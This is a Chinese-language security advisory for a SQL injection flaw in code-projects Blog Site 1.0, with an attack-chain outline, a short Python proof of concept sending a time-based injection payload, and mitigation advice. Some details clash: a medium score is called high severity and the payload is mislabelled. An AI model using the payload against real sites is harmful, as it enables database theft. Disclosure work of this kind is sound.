CVE-2025-13575: code-projects Blog Site 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13575

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

code-projects Blog Site 1.0

漏洞概述

CVE-2025-13575是code-projects Blog Site 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于应用程序的Category Handler组件中，具体位于/resources/functions/blog.php文件的category_exists函数。攻击者可以通过操纵name/field参数实现SQL注入攻击，无需高权限即可执行，可能导致数据库敏感信息泄露、数据篡改或数据库服务器完全沦陷。由于该漏洞已公开披露且利用代码已发布，攻击者可以在互联网上轻易获取相关利用工具，对使用该版本博客系统的网站构成严重威胁。建议受影响的用户立即采取修复措施或应用临时缓解方案。

技术细节

该SQL注入漏洞源于category_exists函数对用户输入的name/field参数缺乏充分的输入验证和参数化查询处理。攻击者可以在HTTP请求中构造恶意的SQL语句片段，通过参数传递注入到数据库查询中。由于函数直接将该参数拼接到SQL查询语句中，攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括用户凭证、配置数据或其他业务数据。漏洞影响多个端点，攻击面广泛。成功的SQL注入可能导致：1) 认证绕过：以低权限用户身份执行管理操作；2) 数据泄露：读取用户表、配置表等敏感数据；3) 数据篡改：修改或删除数据库内容；4) 在特定配置下可能进一步导致操作系统命令执行。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的code-projects Blog Site 1.0版本，确认漏洞存在于/resources/functions/blog.php的category_exists函数

STEP 2

步骤2: 构造恶意请求

攻击者构造包含SQL注入载荷的HTTP请求，操纵name或field参数，注入UNION SELECT或盲注语句

STEP 3

步骤3: 注入执行

恶意参数被传递到category_exists函数，未经充分过滤的参数直接拼接到SQL查询中执行

STEP 4

步骤4: 数据提取

通过盲注或UNION技术提取数据库中的敏感信息，如用户表、密码哈希、管理员凭证等

STEP 5

步骤5: 权限提升与持久化

利用获取的凭证登录后台管理系统，可能进一步获取服务器shell权限或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13575 SQL Injection PoC
# Target: code-projects Blog Site 1.0
# Vulnerability: SQL Injection in category_exists function
# File: /resources/functions/blog.php

import requests
import sys

target = "http://target.com"  # Replace with target URL

def exploit_sqli(url, payload):
    """Send SQL injection payload to vulnerable endpoint"""
    # Example vulnerable parameter
    params = {
        'name': payload,  # Vulnerable parameter
        'field': payload  # Also vulnerable
    }
    
    try:
        response = requests.get(f"{url}/resources/functions/blog.php", params=params)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {e}"

# Boolean-based blind SQL injection payload example
payload = "' OR IF(1=1,SLEEP(5),0)-- -",

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    
    print(f"[*] Testing CVE-2025-13575 on {target}")
    result = exploit_sqli(target, payload)
    print(f"[*] Response received: {len(result)} bytes")

影响范围

code-projects Blog Site 1.0

防御指南

临时缓解措施

立即对/resources/functions/blog.php文件中的category_exists函数进行修复，使用PDO或mysqli的预处理语句替代字符串拼接构建SQL查询。对所有用户可控的输入参数实施严格的白名单验证，限制允许的字符类型和长度。同时配置Web应用防火墙规则拦截包含SQL注入特征的请求模式，如单引号、双破折号、UNION等关键字。在数据库层面，限制应用程序数据库账户的权限，移除不必要的DROP、DELETE、EXECUTE等高危权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13575
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13575
3 Details https://www.cvedetails.com/cve/CVE-2025-13575/
4 VulDB https://vuldb.com/cve/CVE-2025-13575
5 Link https://code-projects.org/
6 Link https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection1.md
7 Link https://github.com/Yohane-Mashiro/cve/blob/main/SQL%20injection2.md
8 Link https://vuldb.com/?ctiid.333339
9 Link https://vuldb.com/?id.333339
10 Link https://vuldb.com/?submit.698769
11 Link https://vuldb.com/?submit.698771